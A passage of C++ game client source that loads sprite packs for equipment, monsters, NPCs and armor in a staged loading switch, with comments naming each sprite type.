			{	m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 16] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 15); // Necks
				//Snoopy: Angels pandents
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 22] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 19); // Angels
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\item-equipW.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 40] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 0, FALSE); // body
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 41] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 1, FALSE); // 1-swords
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 42] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 2, FALSE); // 2-bows
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 43] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 3, FALSE); // 3-shields
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 45] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 4, FALSE); // 4-shoes
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 50] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 5, FALSE); // 5-Soustif
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 51] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 6, FALSE); // 6 berk
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 52] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 7, FALSE); // 7 hose
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 53] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 8, FALSE); // 8-hoses
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 55] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 11, FALSE); // Axe hammer
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 57] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 12, FALSE); // Wands
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 58] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 9, FALSE); // hair
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 59] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 10, FALSE);// undies
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 60] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 13, FALSE);// capes
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 61] = new class CSprite(m_hPakFile, &m_DDraw, "item-equipW", 14, FALSE);// helm
				CloseHandle(m_hPakFile);
			}

			m_hPakFile = CreateFile("sprites\\item-pack.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 56] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 15);// necks
				//Snoopy: Angels pandents
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 62] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 19); // Angels
				CloseHandle(m_hPakFile);
			}
			MakeSprite( "Bm", 500 + 15*8*0, 96, TRUE);// Black Man (Type: 1)
			MakeSprite( "Wm", 500 + 15*8*1, 96, TRUE);// White Man (Type: 2)
			MakeSprite( "Ym", 500 + 15*8*2, 96, TRUE);// Yellow Man (Type: 3)
			m_cLoading = 20;
		}
		break;
	case 20:
		{	MakeSprite( "TutelarAngel1", DEF_SPRID_TUTELARYANGELS_PIVOTPOINT + 50*0, 48, FALSE);//(STR)
			MakeSprite( "TutelarAngel2", DEF_SPRID_TUTELARYANGELS_PIVOTPOINT + 50*1, 48, FALSE);//(DEX)
			MakeSprite( "TutelarAngel3", DEF_SPRID_TUTELARYANGELS_PIVOTPOINT + 50*2, 48, FALSE);//(INT)
			MakeSprite( "TutelarAngel4", DEF_SPRID_TUTELARYANGELS_PIVOTPOINT + 50*3, 48, FALSE);//(MAG)
			MakeSprite( "Bw", 500 + 15*8*3, 96, TRUE);// Black Woman (Type: 4)
			MakeSprite( "Ww", 500 + 15*8*4, 96, TRUE);// White Woman (Type: 5)
			MakeSprite( "Yw", 500 + 15*8*5, 96, TRUE);// Yellow Woman (Type: 6)
			m_cLoading = 24;
		}
		break;
	case 24:
		{	MakeSprite( "slm",		  DEF_SPRID_MOB   + 7*8*0, 40, TRUE);// Slime (Type: 10)
			MakeSprite( "ske",		  DEF_SPRID_MOB   + 7*8*1, 40, TRUE);// Skeleton (Type: 11)
			MakeSprite( "Gol",		  DEF_SPRID_MOB   + 7*8*2, 40, TRUE);// Stone-Golem (Type: 12)
			MakeSprite( "Cyc",		  DEF_SPRID_MOB   + 7*8*3, 40, TRUE);// Cyclops (Type: 13)
			MakeSprite( "Orc",		  DEF_SPRID_MOB   + 7*8*4, 40, TRUE);// Orc (Type: 14)
			MakeSprite( "Shopkpr",	  DEF_SPRID_MOB   + 7*8*5,  8);		// ShopKeeper-Woman (Type: 15)
			MakeSprite( "Ant",		  DEF_SPRID_MOB   + 7*8*6, 40, TRUE);//  Giant-Ant (Type: 16)
			MakeSprite( "Scp",		  DEF_SPRID_MOB   + 7*8*7, 40, TRUE);//  Scorpion (Type: 17)
			MakeSprite( "Zom",		  DEF_SPRID_MOB   + 7*8*8, 40, TRUE);//  Zombie (Type: 18)
			MakeSprite( "Gandlf",	  DEF_SPRID_MOB   + 7*8*9,  8, TRUE);// Gandalf  (Type: 19)
			MakeSprite( "Howard",	  DEF_SPRID_MOB   + 7*8*10, 8, TRUE);// Howard   (Type: 20)
			MakeSprite( "Guard",	  DEF_SPRID_MOB   + 7*8*11, 40, TRUE);// Guard (Type: 21)
			MakeSprite( "Amp",		  DEF_SPRID_MOB   + 7*8*12, 40, TRUE);// Amphis (Type: 22)
			MakeSprite( "Cla",		  DEF_SPRID_MOB   + 7*8*13, 40, TRUE);// Clay-Golem (Type: 23)
			MakeSprite( "tom",		  DEF_SPRID_MOB   + 7*8*14,  8, TRUE);// Tom (Type: 24)
			MakeSprite( "William",	  DEF_SPRID_MOB   + 7*8*15,  8, TRUE);// William (Type: 25)
			m_cLoading = 28;
		}
		break;
	case 28:
		{	MakeSprite( "Kennedy",	  DEF_SPRID_MOB   + 7*8*16,  8, TRUE);// Kennedy (Type: 26)
			MakeSprite( "Helb",		  DEF_SPRID_MOB   + 7*8*17, 40, TRUE);// Hellbound (Type: 27)
			MakeSprite( "Troll",	  DEF_SPRID_MOB   + 7*8*18, 40, TRUE);// Troll (Type: 28)
			MakeSprite( "Orge",		  DEF_SPRID_MOB   + 7*8*19, 40, TRUE);// Orge (Type: 29)
			MakeSprite( "Liche",	  DEF_SPRID_MOB   + 7*8*20, 40, TRUE);// Liche (Type: 30)
			MakeSprite( "Demon",	  DEF_SPRID_MOB   + 7*8*21, 40, TRUE);// Demon (Type: 31)
			MakeSprite( "Unicorn",	  DEF_SPRID_MOB   + 7*8*22, 40, TRUE);// Unicorn (Type: 32)
			MakeSprite( "WereWolf",	  DEF_SPRID_MOB   + 7*8*23, 40, TRUE);// WereWolf (Type: 33)
			MakeSprite( "Dummy",	  DEF_SPRID_MOB   + 7*8*24, 40, TRUE);// Dummy (Type: 34)
			m_hPakFile = CreateFile("sprites\\Effect5.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL); // Energy-Ball (Type: 35)
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 40; i++)
					m_pSprite[  DEF_SPRID_MOB + i + 7*8*25] = new class CSprite(m_hPakFile, &m_DDraw, "Effect5", 0, TRUE);

				CloseHandle(m_hPakFile);
			}
			m_cLoading = 32;
		}
		break;
	case 32:
		{MakeSprite( "GT-Arrow",		  DEF_SPRID_MOB   + 7*8*26, 40, TRUE);// Arrow-GuardTower (Type: 36)
			MakeSprite( "GT-Cannon",	  DEF_SPRID_MOB   + 7*8*27, 40, TRUE);// Cannon-GuardTower (Type: 37)
			MakeSprite( "ManaCollector",  DEF_SPRID_MOB   + 7*8*28, 40, TRUE);// Mana Collector (Type: 38)
			MakeSprite( "Detector",		  DEF_SPRID_MOB   + 7*8*29, 40, TRUE);// Detector (Type: 39)
			MakeSprite( "ESG",			  DEF_SPRID_MOB   + 7*8*30, 40, TRUE);// ESG (Type: 40)
			MakeSprite( "GMG",			  DEF_SPRID_MOB   + 7*8*31, 40, TRUE);// GMG (Type: 41)
			MakeSprite( "ManaStone",	  DEF_SPRID_MOB   + 7*8*32, 40, TRUE);// ManaStone (Type: 42)
			MakeSprite( "LWB",			  DEF_SPRID_MOB   + 7*8*33, 40, TRUE);// Light War Beetle (Type: 43)
			MakeSprite( "GHK",		  DEF_SPRID_MOB   + 7*8*34, 40, TRUE);// God's Hand Knight (Type: 44)
			MakeSprite( "GHKABS",	  DEF_SPRID_MOB   + 7*8*35, 40, TRUE);// God's Hand Knight with Armored Battle Steed (Type: 45)
			MakeSprite( "TK",		  DEF_SPRID_MOB   + 7*8*36, 40, TRUE);// Temple Knight (Type: 46)
			MakeSprite( "BG",		  DEF_SPRID_MOB   + 7*8*37, 40, TRUE);// Battle Golem (Type: 47)
			m_cLoading = 36;
		}
		break;
	case 36:
		{
			MakeSprite( "Stalker",	  DEF_SPRID_MOB   + 7*8*38, 40, TRUE);// Stalker (Type: 48)
			MakeSprite( "Hellclaw",	  DEF_SPRID_MOB   + 7*8*39, 40, TRUE);// Hellclaw (Type: 49)
			MakeSprite( "Tigerworm",  DEF_SPRID_MOB   + 7*8*40, 40, TRUE);// Tigerworm (Type: 50)
			MakeSprite( "Catapult",	  DEF_SPRID_MOB   + 7*8*41, 40, TRUE);// Catapult (Type: 51)
			MakeSprite( "Gagoyle",	  DEF_SPRID_MOB   + 7*8*42, 40, TRUE);// Gargoyle (Type: 52)
			MakeSprite( "Beholder",	  DEF_SPRID_MOB   + 7*8*43, 40, TRUE);// Beholder (Type: 53)
			MakeSprite( "DarkElf",	  DEF_SPRID_MOB   + 7*8*44, 40, TRUE);// Dark-Elf (Type: 54)
			MakeSprite( "Bunny",	  DEF_SPRID_MOB   + 7*8*45, 40, TRUE);// Bunny (Type: 55)
			MakeSprite( "Cat",		  DEF_SPRID_MOB   + 7*8*46, 40, TRUE);// Cat (Type: 56)
			MakeSprite( "GiantFrog",  DEF_SPRID_MOB   + 7*8*47, 40, TRUE);// GiantFrog (Type: 57)
			MakeSprite( "MTGiant",	  DEF_SPRID_MOB   + 7*8*48, 40, TRUE);// Mountain Giant (Type: 58)
			m_cLoading = 40;
		}
		break;
	case 40:
		{	MakeSprite( "Ettin",	  DEF_SPRID_MOB   + 7*8*49, 40, TRUE);// Ettin (Type: 59)
			MakeSprite( "CanPlant",	  DEF_SPRID_MOB   + 7*8*50, 40, TRUE);// Cannibal Plant (Type: 60)
			MakeSprite( "Rudolph",	  DEF_SPRID_MOB   + 7*8*51, 40, TRUE);// Rudolph (Type: 61)
			MakeSprite( "DireBoar",	  DEF_SPRID_MOB   + 7*8*52, 40, TRUE);// Boar (Type: 62)
			MakeSprite( "frost",	  DEF_SPRID_MOB   + 7*8*53, 40, TRUE);// Frost (Type: 63)
			MakeSprite( "Crop",		  DEF_SPRID_MOB   + 7*8*54, 40, TRUE);// Crop(Type: 64)
			MakeSprite( "IceGolem",	  DEF_SPRID_MOB   + 7*8*55, 40, TRUE);// IceGolem (Type: 65)
			MakeSprite( "Wyvern",	  DEF_SPRID_MOB   + 7*8*56, 24, TRUE);// Wyvern (Type: 66)
			MakeSprite( "McGaffin",	  DEF_SPRID_MOB   + 7*8*57, 16, TRUE);// McGaffin (Type: 67)
			MakeSprite( "Perry",	  DEF_SPRID_MOB   + 7*8*58, 16, TRUE);// Perry (Type: 68)
			MakeSprite( "Devlin",	  DEF_SPRID_MOB   + 7*8*59, 16, TRUE);// Devlin (Type: 69)
			MakeSprite( "Barlog",		  DEF_SPRID_MOB   + 7*8*60, 40, TRUE);// Barlog (Type: 70)
			MakeSprite( "Centaurus",	  DEF_SPRID_MOB   + 7*8*61, 40, TRUE);// Centaurus (Type: 71)
			MakeSprite( "ClawTurtle",	  DEF_SPRID_MOB   + 7*8*62, 40, TRUE);// Claw-Turtle (Type: 72)
			MakeSprite( "FireWyvern",	  DEF_SPRID_MOB   + 7*8*63, 24, TRUE);// Fire-Wyvern (Type: 73)
			MakeSprite( "GiantCrayfish",  DEF_SPRID_MOB   + 7*8*64, 40, TRUE);// Giant-Crayfish (Type: 74)
			MakeSprite( "GiantLizard",	  DEF_SPRID_MOB   + 7*8*65, 40, TRUE);// Giant-Lizard (Type: 75)
			m_cLoading = 44;
		}
		break;
	case 44:
		{	// New NPCs - Diuuude - fixed by Snoopy
			MakeSprite( "GiantPlant",	  DEF_SPRID_MOB   + 7*8*66, 40, TRUE);// Giant-Plant (Type: 76)
			MakeSprite( "MasterMageOrc",  DEF_SPRID_MOB   + 7*8*67, 40, TRUE);// MasterMage-Orc (Type: 77)
			MakeSprite( "Minotaurs",	  DEF_SPRID_MOB   + 7*8*68, 40, TRUE);// Minotaurs (Type: 78)
			MakeSprite( "Nizie",		  DEF_SPRID_MOB   + 7*8*69, 40, TRUE);// Nizie (Type: 79)
			MakeSprite( "Tentocle",		  DEF_SPRID_MOB   + 7*8*70, 40, TRUE);// Tentocle (Type: 80)
			MakeSprite( "yspro",		  DEF_SPRID_MOB   + 7*8*71, 32, TRUE);// Abaddon (Type: 81)
			MakeSprite( "Sorceress",	  DEF_SPRID_MOB   + 7*8*72, 40, TRUE);// Sorceress (Type: 82)
			MakeSprite( "TPKnight",		  DEF_SPRID_MOB   + 7*8*73, 40, TRUE);// TPKnight (Type: 83)
			MakeSprite( "ElfMaster",	  DEF_SPRID_MOB   + 7*8*74, 40, TRUE);// ElfMaster (Type: 84)
			MakeSprite( "DarkKnight",	  DEF_SPRID_MOB   + 7*8*75, 40, TRUE);// DarkKnight (Type: 85)
			MakeSprite( "HBTank",		  DEF_SPRID_MOB   + 7*8*76, 32, TRUE);// HeavyBattleTank (Type: 86)
			MakeSprite( "CBTurret",		  DEF_SPRID_MOB   + 7*8*77, 32, TRUE);// CBTurret (Type: 87)
			MakeSprite( "Babarian",		  DEF_SPRID_MOB   + 7*8*78, 40, TRUE);// Babarian (Type: 88)
			MakeSprite( "ACannon",		  DEF_SPRID_MOB   + 7*8*79, 32, TRUE);// ACannon (Type: 89)
			m_cLoading = 48;
		}
		break;
	case 48:
		{	MakeSprite( "Gail",			  DEF_SPRID_MOB   + 7*8*80, 8, TRUE); // Gail (Type: 90)
			MakeSprite( "Gate",			  DEF_SPRID_MOB   + 7*8*81, 24, TRUE);// Heldenian Gate (Type: 91)/**/
			m_hPakFile = CreateFile("sprites\\Mpt.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*0] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*0, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*1] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*1, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*2] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*2, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*3] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*3, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*4] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*4, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*5] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*5, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*6] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*6, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_UNDIES_M + i + 15*7] = new class CSprite(m_hPakFile, &m_DDraw, "Mpt", i + 12*7, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_cLoading = 52;
		}
		break;

	case 52:
		{	m_hPakFile = CreateFile("sprites\\Mhr.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*0] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*0, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*1] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*1, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*2] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*2, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*3] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*3, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*4] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*4, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*5] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*5, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*6] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*6, TRUE);
				for (i = 0; i < 12; i++) m_pSprite[DEF_SPRID_HAIR_M + i + 15*7] = new class CSprite(m_hPakFile, &m_DDraw, "Mhr", i + 12*7, TRUE);
				CloseHandle(m_hPakFile);
			}
			MakeSprite( "MLArmor",	DEF_SPRID_BODYARMOR_M + 15*1, 12, TRUE);
			MakeSprite( "MCMail",	DEF_SPRID_BODYARMOR_M + 15*2, 12, TRUE);
			MakeSprite( "MSMail",	DEF_SPRID_BODYARMOR_M + 15*3, 12, TRUE);
			MakeSprite( "MPMail",	DEF_SPRID_BODYARMOR_M + 15*4, 12, TRUE);
			MakeSprite( "Mtunic",	DEF_SPRID_BODYARMOR_M + 15*5, 12, TRUE);
			MakeSprite( "MRobe1",	DEF_SPRID_BODYARMOR_M + 15*6, 12, TRUE);
			MakeSprite( "MSanta",	DEF_SPRID_BODYARMOR_M + 15*7, 12, TRUE);
			MakeSprite( "MHRobe1",	DEF_SPRID_BODYARMOR_M + 15*10, 12, TRUE); //hero
			MakeSprite( "MHRobe2",	DEF_SPRID_BODYARMOR_M + 15*11, 12, TRUE); //hero
			MakeSprite( "MHPMail1",	DEF_SPRID_BODYARMOR_M + 15*8, 12, TRUE); //hero
			MakeSprite( "MHPMail2",	DEF_SPRID_BODYARMOR_M + 15*9, 12, TRUE); //hero
			MakeSprite( "MShirt",	  DEF_SPRID_BERK_M + 15*1, 12, TRUE);
			MakeSprite( "MHauberk",	  DEF_SPRID_BERK_M + 15*2, 12, TRUE);
			MakeSprite( "MHHauberk1", DEF_SPRID_BERK_M + 15*3, 12, TRUE);
			MakeSprite( "MHHauberk2", DEF_SPRID_BERK_M + 15*4, 12, TRUE);
			m_cLoading = 56;
		}
		break;
	case 56:
		{	MakeSprite( "MTrouser",	DEF_SPRID_LEGG_M + 15*1, 12, TRUE);
			MakeSprite( "MHTrouser",DEF_SPRID_LEGG_M + 15*2, 12, TRUE);
			MakeSprite( "MCHoses",	DEF_SPRID_LEGG_M + 15*3, 12, TRUE);
			MakeSprite( "MLeggings",DEF_SPRID_LEGG_M + 15*4, 12, TRUE);
			MakeSprite( "MHLeggings1",	DEF_SPRID_LEGG_M + 15*5, 12, TRUE); // hero
			MakeSprite( "MHLeggings2",DEF_SPRID_LEGG_M + 15*6, 12, TRUE); // hero
			MakeSprite( "MShoes",	DEF_SPRID_BOOT_M + 15*1, 12, TRUE);
			MakeSprite( "MLBoots",	DEF_SPRID_BOOT_M + 15*2, 12, TRUE);
			m_hPakFile = CreateFile("sprites\\Msw.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE ) {
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*1] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*0, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*2] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*1, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*3] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*2, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*4] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*3, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*6] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*5, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*7] = new class CSprite(m_hPakFile, &m_DDraw,  "Msw", i + 56*6, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*8] = new class CSprite(m_hPakFile, &m_DDraw,  "Msw", i + 56*7, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*9] = new class CSprite(m_hPakFile, &m_DDraw,  "Msw", i + 56*8, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*10] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*9, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*11] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*10, TRUE);
				for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*12] = new class CSprite(m_hPakFile, &m_DDraw, "Msw", i + 56*11, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_cLoading = 60;
		}
		break;
	case 60:
		{	MakeSprite( "Mswx",			DEF_SPRID_WEAPON_M + 64*5, 56, TRUE);
			MakeSprite( "Msw2",			DEF_SPRID_WEAPON_M + 64*13, 56, TRUE);
            MakeSprite( "Msw3",			DEF_SPRID_WEAPON_M + 64*14, 56, TRUE);
			MakeSprite( "MStormBringer",DEF_SPRID_WEAPON_M + 64*15, 56, TRUE);
			MakeSprite( "MDarkExec",	DEF_SPRID_WEAPON_M + 64*16, 56, TRUE);
			MakeSprite( "MKlonessBlade",DEF_SPRID_WEAPON_M + 64*17, 56, TRUE);
			MakeSprite( "MKlonessAstock",DEF_SPRID_WEAPON_M + 64*18, 56, TRUE);
			MakeSprite( "MDebastator",	DEF_SPRID_WEAPON_M + 64*19, 56, TRUE);
			MakeSprite( "MAxe1",		DEF_SPRID_WEAPON_M + 64*20, 56, TRUE);// Axe
			MakeSprite( "MAxe2",		DEF_SPRID_WEAPON_M + 64*21, 56, TRUE);
			MakeSprite( "MAxe3",		DEF_SPRID_WEAPON_M + 64*22, 56, TRUE);
			MakeSprite( "MAxe4",		DEF_SPRID_WEAPON_M + 64*23, 56, TRUE);
			MakeSprite( "MAxe5",		DEF_SPRID_WEAPON_M + 64*24, 56, TRUE);
			MakeSprite( "MPickAxe1",	DEF_SPRID_WEAPON_M + 64*25, 56, TRUE);
			MakeSprite( "MAxe6",		DEF_SPRID_WEAPON_M + 64*26, 56, TRUE);
			MakeSprite( "Mhoe",			DEF_SPRID_WEAPON_M + 64*27, 56, TRUE);
			MakeSprite( "MKlonessAxe",	DEF_SPRID_WEAPON_M + 64*28, 56, TRUE);
			MakeSprite( "MLightBlade",	DEF_SPRID_WEAPON_M + 64*29, 56, TRUE);
			m_cLoading = 64;
		}
		break;
	case 64:
		{	MakeSprite( "MHammer",		DEF_SPRID_WEAPON_M + 64*30, 56, TRUE);
			MakeSprite( "MBHammer",		DEF_SPRID_WEAPON_M + 64*31, 56, TRUE);
			MakeSprite( "MBabHammer",	DEF_SPRID_WEAPON_M + 64*32, 56, TRUE);
			MakeSprite( "MBShadowSword",DEF_SPRID_WEAPON_M + 64*33, 56, TRUE);
			MakeSprite( "MBerserkWand", DEF_SPRID_WEAPON_M + 64*34, 56, TRUE);
			MakeSprite( "Mstaff1",		DEF_SPRID_WEAPON_M + 64*35, 56, TRUE);// Staff
			MakeSprite( "Mstaff2",		DEF_SPRID_WEAPON_M + 64*36, 56, TRUE);
			MakeSprite( "MStaff3",		DEF_SPRID_WEAPON_M + 64*37, 56, TRUE);
			MakeSprite( "MReMagicWand", DEF_SPRID_WEAPON_M + 64*38, 56, TRUE);
			MakeSprite( "MKlonessWand", DEF_SPRID_WEAPON_M + 64*39, 56, TRUE);
			// Bows 40 41 below
			MakeSprite( "MDirectBow",	DEF_SPRID_WEAPON_M + 64*42, 56, TRUE);
			MakeSprite( "MFireBow",		DEF_SPRID_WEAPON_M + 64*43, 56, TRUE);
			m_cLoading = 68;
		}
		break;
	case 68:
		{	MakeSprite( "Mbo", DEF_SPRID_WEAPON_M + 64*40, 56, TRUE);
			m_hPakFile = CreateFile("sprites\\Mbo.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 56; i++) m_pSprite[DEF_SPRID_WEAPON_M + i + 64*41] = new class CSprite(m_hPakFile, &m_DDraw, "Mbo", i + 56*1, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_hPakFile = CreateFile("sprites\\Msh.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
			if( m_hPakFile != INVALID_HANDLE_VALUE )
			{	for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*1] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*0, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*2] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*1, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*3] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*2, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*4] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*3, TRUE);
				for (i = 0; i < 7; i++)	m_pSprite[DEF_SPRID_SHIELD_M + i + 8*5] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*4, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*6] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*5, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*7] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*6, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*8] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*7, TRUE);
				for (i = 0; i < 7; i++) m_pSprite[DEF_SPRID_SHIELD_M + i + 8*9] = new class CSprite(m_hPakFile, &m_DDraw, "Msh", i + 7*8, TRUE);
				CloseHandle(m_hPakFile);
			}
			m_cLoading = 72;
		}
		break;
	case 72:
		{	MakeSprite( "Mmantle01", DEF_SPRID_MANTLE_M + 15*1, 12, TRUE);
			MakeSprite( "Mmantle02", DEF_SPRID_MANTLE_M + 15*2, 12, TRUE);
			MakeSprite( "Mmantle03", DEF_SPRID_MANTLE_M + 15*3, 12, TRUE);
			MakeSprite( "Mmantle04", DEF_SPRID_MANTLE_M + 15*4, 12, TRUE);
			MakeSprite( "Mmantle05", DEF_SPRID_MANTLE_M + 15*5, 12, TRUE);
			MakeSprite( "Mmantle06", DEF_SPRID_MANTLE_M + 15*6, 12, TRUE);
			MakeSprite( "MHelm1", DEF_SPRID_HEAD_M + 15*1, 12, TRUE);
			MakeSprite( "MHelm2", DEF_SPRID_HEAD_M + 15*2, 12, TRUE);
			MakeSprite( "MHelm3", DEF_SPRID_HEAD_M + 15*3, 12, TRUE);
			MakeSprite( "MHelm4", DEF_SPRID_HEAD_M + 15*4, 12, TRUE);
			MakeSprite( "MHCap1", DEF_SPRID_HEAD_M + 15*11, 12, TRUE);
			MakeSprite( "MHCap2", DEF_SPRID_HEAD_M + 15*12, 12, TRUE);
			MakeSprite( "MHHelm1", DEF_SPRID_HEAD_M + 15*9, 12, TRUE);
			MakeSprite( "MHHelm2", DEF_SPRID_HEAD_M + 15*10, 12, TRUE);
